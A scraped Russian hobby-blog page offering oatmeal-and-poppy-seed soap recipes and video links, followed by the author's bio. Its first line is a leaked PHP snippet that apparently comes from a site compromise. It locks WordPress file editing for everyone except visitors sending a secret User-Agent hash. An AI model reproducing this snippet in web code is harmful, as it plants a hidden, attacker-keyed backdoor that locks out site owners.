if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 5 видеорецептов, как сделать полезное мыло, или “Ваша овсянка, сэр!” :) | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

5 видеорецептов, как сделать полезное мыло, или “Ваша овсянка, сэр!” :)

Многогранность полезных качеств овсянки всегда приятно удивляет, но мало кто знает, что мастера мыловарения могут сделать мыло даже из нее. Существует пять полезных рецептов изготовления мыла из овсянки, с добавлением эфирных масел и мака

Мно­го­гран­ность полез­ных качеств овсян­ки все­гда при­ят­но удив­ля­ет, но мало кто зна­ет, что масте­ра мыло­ва­ре­ния могут сде­лать мыло даже из нее. Суще­ству­ет пять полез­ных рецеп­тов изго­тов­ле­ния мыла из овсян­ки, с добав­ле­ни­ем эфир­ных масел и мака. Одно из них, напри­мер, мыло-скраб из овсян­ки пре­крас­но отше­лу­ши­ва­ет поверх­ност­ный слой кожи, увлаж­няя, и не трав­ми­руя ее.

Для изго­тов­ле­ния тако­го мыла в домаш­них усло­ви­ях пона­до­бит­ся, конеч­но, овсян­ка и мак,  а так­же дру­гие, клас­си­че­ские ком­по­нен­ты для мыло­ва­ре­ния. При­го­тов­ле­ние мыла из овсян­ки очень про­стое, и не зай­мет мно­го вре­ме­ни. К клас­си­че­ской рас­топ­лен­ной мыль­ной осно­ве с пере­ме­шен­ны­ми мас­ла­ми, кра­си­те­ля­ми, аро­ма­ти­за­то­ра­ми, добав­ля­ет­ся поло­ви­ну чай­ной лож­ки мака и овся­ные хло­пья. В каче­стве укра­ше­ния в пери­од засты­ва­ния, исполь­зуй­те хло­пья овсян­ки. Такое полез­ное, про­стое и, навер­ня­ка, вкус­ное мыло, сде­лан­ное сво­и­ми рука­ми, сохра­нит моло­дость Вашей кожи на дол­гое вре­мя. А теперь смот­рим еще 4 полез­ных видеорецепта!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!